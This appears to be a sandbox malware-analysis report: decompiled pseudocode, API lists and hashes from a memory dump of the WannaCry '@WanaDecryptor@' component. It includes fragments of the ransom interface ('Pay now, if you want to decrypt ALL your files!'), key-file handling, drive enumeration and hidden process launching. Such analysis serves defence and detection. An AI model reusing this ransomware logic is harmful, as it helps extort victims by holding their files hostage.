0x0041316c
0x00413171
0x00413177
0x0041317e
0x00413184
0x00413185
0x0041318a
0x0041318f
0x00413194
0x00413199
0x0041319e
0x004131b7
0x004131bd
0x004131c2
0x004131c7
0x004131d4
0x004131d6
0x004131dc
0x00413218
0x0041321d
0x0041321e
0x0041321e
0x004131de
0x004131de
0x004131de
0x004131df
0x004131e2
0x004131e4
0x004131ef
0x004131f1
0x004131f1
0x004131f2
0x004131f2
0x004131ef
0x004131f5
0x004131f9
0x00000000
0x00000000
0x004131ff
0x00413206
0x00413210
0x00413225
0x00413212
0x00413212
0x00413212
0x00413231
0x00413236
0x0041323a
0x00413240
0x00413245
0x00413247
0x0041324a
0x0041324b
0x0041324c
0x00413253

APIs

__set_app_type.MSVCRT ref: 0041312F
__p__fmode.MSVCRT ref: 00413144
__p__commode.MSVCRT ref: 00413152
__setusermatherr.MSVCRT ref: 0041317E
_initterm.MSVCRT ref: 00413194
__getmainargs.MSVCRT ref: 004131B7
_initterm.MSVCRT ref: 004131C7
GetStartupInfoA.KERNEL32(?), ref: 00413206
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
exit.MSVCRT ref: 0041323A
_XcptFilter.MSVCRT ref: 0041324C

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}

0x00404281
0x00404289
0x0040428b
0x0040428b
0x00404297
0x0040429e
0x004042fd
0x004042ff
0x00404306
0x004042a0
0x004042a0
0x004042a3
0x004042a5
0x004042ac
0x004042b3
0x004042f7
0x00000000
0x004042b5
0x004042bb
0x004042c1
0x004042c2
0x004042d5
0x004042dd
0x004042e4
0x004042e4
0x004042b3

APIs

#6663.MFC42(mailto:,00000000,?), ref: 004042AC
GetParent.USER32(?), ref: 004042BB
#2864.MFC42(00000000), ref: 004042C2
SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
#2379.MFC42 ref: 004042DD

Part of subcall function 00404530: #289.MFC42 ref: 0040455F
Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
Part of subcall function 00404530: #613.MFC42 ref: 004045BB

ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
#2379.MFC42(?), ref: 004042FF

Strings

open, xrefs: 004042F0
mailto:, xrefs: 004042A5

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
String ID: mailto:$open
API String ID: 1144735033-2326261162
Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}

0x004038f6
0x004038f8
0x004038fd
0x004038fe
0x00403905
0x0040390d
0x00403911
0x0040392c
0x00403931
0x00403948
0x0040394d
0x0040394f
0x00403953
0x00403953
0x0040395c
0x0040396f
0x0040397a
0x00403980
0x0040399a
0x004039b6
0x004039bb
0x004039bd
0x004039bf
0x004039c1
0x004039c3
0x00000000
0x004039c3
0x0040399c
0x004039a1
0x004039a3
0x004039a5
0x004039a7
0x004039c8
0x004039c8
0x004039c8
0x004039a1
0x004039d1
0x004039dc
0x004039dc
0x004039e5
0x004039f1
0x004039fe
0x00403a0a
0x00403a17

APIs

Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
sprintf.MSVCRT ref: 0040397A
#1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8

Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17

Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95

CloseHandle.KERNEL32(?,00000001), ref: 004039F1

Strings

All your files have been decrypted!, xrefs: 004039C3
%08X.dky, xrefs: 00403969
Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
API String ID: 139182656-2046724789
Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}

0x00404090
0x00404092
0x00404097
0x0040409d
0x0040409e
0x004040a5
0x004040a9
0x004040ac
0x004040b0
0x004040b5
0x004040c2
0x004040c6
0x004040ce
0x004040d5
0x004040da
0x004040dd
0x004040e4
0x004040eb
0x004040f0
0x004040f6
0x004040fb
0x004040fe
0x0040410f
0x00404112
0x00404115
0x00404120
0x00404129
0x0040412c
0x00404139
0x00404143

APIs

#567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
#540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
#540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
#860.MFC42(00421798), ref: 004040F6
#858.MFC42(00000000,00421798), ref: 004040FE
LoadCursorA.USER32(00000000,00007F89), ref: 00404118
LoadCursorA.USER32(00000000,00007F00), ref: 00404123

Strings

0ZA, xrefs: 004040DD

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #540CursorLoad$#567#858#860
String ID: 0ZA
API String ID: 2440951079-2594568282
Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}

0x00407cb0
0x00407cb2
0x00407cbd
0x00407cbe
0x00407cc5
0x00407cd1
0x00407cda
0x00407ce5
0x00407cea
0x00407cf5
0x00407cfc
0x00407d07
0x00407d12
0x00407d1a
0x00407d26
0x00407d31
0x00407d35
0x00407d47
0x00407d4f
0x00407d5b
0x00407d66
0x00407d6e
0x00407d77
0x00407d7f
0x00407d88
0x00407d93
0x00407d9f
0x00407dac

APIs

Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131

#2514.MFC42 ref: 00407CE5
#2414.MFC42 ref: 00407D1A
#2414.MFC42 ref: 00407D4F
#616.MFC42 ref: 00407D6E
#693.MFC42 ref: 00407D7F
#641.MFC42 ref: 00407D93

Strings

[A, xrefs: 00407D5B
[A, xrefs: 00407D26

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#567$#2514#324#616#641#693
String ID: [A$[A
API String ID: 3779294304-353784214
Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57

Uniqueness

Uniqueness Score: -1.00%

Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				intOrPtr* _t68;
				signed int _t76;
				struct HWND__* _t92;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t120;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_t68 =  *0x422210; // 0xa94228
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_t113 =  *0x422210; // 0xa94228
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							_t114 =  *0x422210; // 0xa94228
							 *((intOrPtr*)( *_t114 + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							_t118 =  *0x422210; // 0xa94228
							 *((intOrPtr*)( *_t118 + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						_t120 =  *0x422210; // 0xa94228
						 *((intOrPtr*)( *_t120 + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}

0x0040c240
0x0040c248
0x0040c253
0x0040c25a
0x0040c260
0x0040c26c
0x0040c283
0x0040c28e
0x0040c293
0x0040c296
0x0040c29b
0x0040c2a0
0x0040c2c8
0x0040c2d7
0x0040c2e3
0x0040c2e3
0x0040c2ec
0x0040c2ee
0x0040c2f3
0x0040c303
0x0040c307
0x0040c309
0x0040c30e
0x0040c31f
0x0040c330
0x0040c340
0x0040c342
0x0040c347
0x0040c34b
0x0040c350
0x0040c35b
0x0040c35d
0x0040c362
0x0040c366
0x0040c372
0x0040c373
0x0040c378
0x0040c37d
0x0040c382
0x0040c38f
0x0040c39f
0x0040c3a0
0x0040c3a7
0x0040c3e2
0x0040c3ee
0x0040c3ee
0x0040c3f0
0x0040c3fa
0x0040c402
0x0040c403
0x0040c411
0x0040c417
0x0040c452
0x0040c458
0x0040c45c
0x0040c470
0x0040c472
0x0040c477
0x0040c489
0x0040c48f
0x0040c494
0x0040c497
0x0040c497
0x0040c477
0x0040c45c
0x0040c49e
0x0040c4a9
0x0040c4a9
0x0040c4ab
0x0040c4b3
0x0040c4b6
0x0040c4c1
0x0040c4c5
0x0040c4ca
0x0040c419
0x0040c41b
0x0040c427
0x0040c427
0x0040c429
0x0040c431
0x0040c438
0x0040c448
0x0040c448
0x00000000
0x0040c3a9
0x0040c3ab
0x0040c3b7
0x0040c3b7
0x0040c3b9
0x0040c3c1
0x0040c3c8
0x0040c3d8
0x0040c4cc
0x0040c4d7
0x0040c4e4
0x0040c4e4
0x0040c3a7
0x0040c2a2
0x0040c2ab
0x0040c2b6
0x0040c2b6
0x0040c2bc
0x00000000

APIs

Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C

SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
fopen.MSVCRT ref: 0040C46B
fwrite.MSVCRT ref: 0040C489
fclose.MSVCRT ref: 0040C48F
SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#823fclosefopenfwrite
String ID:
API String ID: 1132507536-0
Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}

0x00401aa0
0x00401aa8
0x00401ab5
0x00401abb
0x00401ac5
0x00401ad2
0x00401ad6
0x00401ade
0x00401aeb
0x00401b4c
0x00401aed
0x00401aed
0x00401af3
0x00401b03
0x00401b0c
0x00401b0c
0x00401b12
0x00401b18
0x00401b20
0x00401b20
0x00401b18
0x00401b31
0x00401b38
0x00401b44
0x00401b44

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38

Strings

D, xrefs: 00401AA0

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 786732093-2746444292
Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
windowtimethreadCOMMON

Download Yara Rule

